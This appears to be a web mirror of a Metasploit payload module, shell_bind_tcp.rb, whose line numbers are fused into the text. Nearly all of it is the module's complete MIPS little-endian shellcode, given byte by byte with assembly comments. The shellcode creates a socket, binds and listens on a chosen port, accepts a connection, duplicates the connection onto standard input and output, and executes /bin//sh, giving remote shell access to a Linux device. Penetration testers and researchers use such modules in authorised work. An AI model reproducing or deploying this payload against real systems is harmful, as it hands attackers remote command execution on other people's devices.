Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb
Views: 11782
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##456module MetasploitModule78CachedSize = 232910include Msf::Payload::Single11include Msf::Payload::Linux12include Msf::Sessions::CommandShellOptions1314def initialize(info = {})15super(merge_info(info,16'Name' => 'Linux Command Shell, Bind TCP Inline',17'Description' => 'Listen for a connection and spawn a command shell',18'Author' =>19[20'scut', # Original mips-irix-portshell shellcode21'vaicebine', # Original shellcode mod22'Vlatko Kosturjak', # Metasploit module23'juan vazquez' # Small fixes and optimizations24],25'License' => MSF_LICENSE,26'Platform' => 'linux',27'Arch' => ARCH_MIPSLE,28'Handler' => Msf::Handler::BindTcp,29'Session' => Msf::Sessions::CommandShellUnix,30'Payload' =>31{32'Offsets' => {} ,33'Payload' => ''34})35)36end3738def generate(_opts = {})39if !datastore['LPORT']40return super41end4243port = Integer(datastore['LPORT'])44port = [port].pack("n").unpack("cc");4546shellcode =47"\xe0\xff\xbd\x27" + # addiu sp,sp,-3248"\xfd\xff\x0e\x24" + # li t6,-349"\x27\x20\xc0\x01" + # nor a0,t6,zero50"\x27\x28\xc0\x01" + # nor a1,t6,zero51"\xff\xff\x06\x28" + # slti a2,zero,-152"\x57\x10\x02\x24" + # li v0,4183 ( __NR_socket )53"\x0c\x01\x01\x01" + # syscall5455"\xff\xff\x50\x30" + # andi s0,v0,0xffff56"\xef\xff\x0e\x24" + # li t6,-17 ; t6: 0xffffffef57"\x27\x70\xc0\x01" + # nor t6,t6,zero ; t6: 0x10 (16)58port.pack("C2") + "\x0d\x24" + # li t5,0xFFFF (port) ; t5: 0x5c11 (0x115c == 4444 (default LPORT))59"\x04\x68\xcd\x01" + # sllv t5,t5,t6 ; t5: 0x5c11000060"\xfd\xff\x0e\x24" + # li t6,-3 ; t6: -361"\x27\x70\xc0\x01" + # nor t6,t6,zero ; t6: 0x262"\x25\x68\xae\x01" + # or t5,t5,t6 ; t5: 0x5c11000263"\xe0\xff\xad\xaf" + # sw t5,-32(sp)64"\xe4\xff\xa0\xaf" + # sw zero,-28(sp)65"\xe8\xff\xa0\xaf" + # sw zero,-24(sp)66"\xec\xff\xa0\xaf" + # sw zero,-20(sp)67"\x25\x20\x10\x02" + # or a0,s0,s068"\xef\xff\x0e\x24" + # li t6,-1769"\x27\x30\xc0\x01" + # nor a2,t6,zero70"\xe0\xff\xa5\x23" + # addi a1,sp,-3271"\x49\x10\x02\x24" + # li v0,4169 ( __NR_bind )A72"\x0c\x01\x01\x01" + # syscall7374"\x25\x20\x10\x02" + # or a0,s0,s075"\x01\x01\x05\x24" + # li a1,25776"\x4e\x10\x02\x24" + # li v0,4174 ( __NR_listen )77"\x0c\x01\x01\x01" + # syscall7879"\x25\x20\x10\x02" + # or a0,s0,s080"\xff\xff\x05\x28" + # slti a1,zero,-181"\xff\xff\x06\x28" + # slti a2,zero,-182"\x48\x10\x02\x24" + # li v0,4168 ( __NR_accept )83"\x0c\x01\x01\x01" + # syscall8485"\xff\xff\xa2\xaf" + # sw v0,-1(sp) # socket86"\xfd\xff\x11\x24" + # li s1,-387"\x27\x88\x20\x02" + # nor s1,s1,zero88"\xff\xff\xa4\x8f" + # lw a0,-1(sp)89"\x21\x28\x20\x02" + # move a1,s1 # dup2_loop90"\xdf\x0f\x02\x24" + # li v0,4063 ( __NR_dup2 )91"\x0c\x01\x01\x01" + # syscall 0x4040492"\xff\xff\x10\x24" + # li s0,-193"\xff\xff\x31\x22" + # addi s1,s1,-194"\xfa\xff\x30\x16" + # bne s1,s0 <dup2_loop>9596"\xff\xff\x06\x28" + # slti a2,zero,-197"\x62\x69\x0f\x3c" + # lui t7,0x2f2f "bi"98"\x2f\x2f\xef\x35" + # ori t7,t7,0x6269 "//"99"\xec\xff\xaf\xaf" + # sw t7,-20(sp)100"\x73\x68\x0e\x3c" + # lui t6,0x6e2f "sh"101"\x6e\x2f\xce\x35" + # ori t6,t6,0x7368 "n/"102"\xf0\xff\xae\xaf" + # sw t6,-16(sp)103"\xf4\xff\xa0\xaf" + # sw zero,-12(sp)104"\xec\xff\xa4\x27" + # addiu a0,sp,-20105"\xf8\xff\xa4\xaf" + # sw a0,-8(sp)106"\xfc\xff\xa0\xaf" + # sw zero,-4(sp)107"\xf8\xff\xa5\x27" + # addiu a1,sp,-8108"\xab\x0f\x02\x24" + # li v0,4011 ( __NR_execve )109"\x0c\x01\x01\x01" # syscall 0x40404110111return super + shellcode112end113end114115116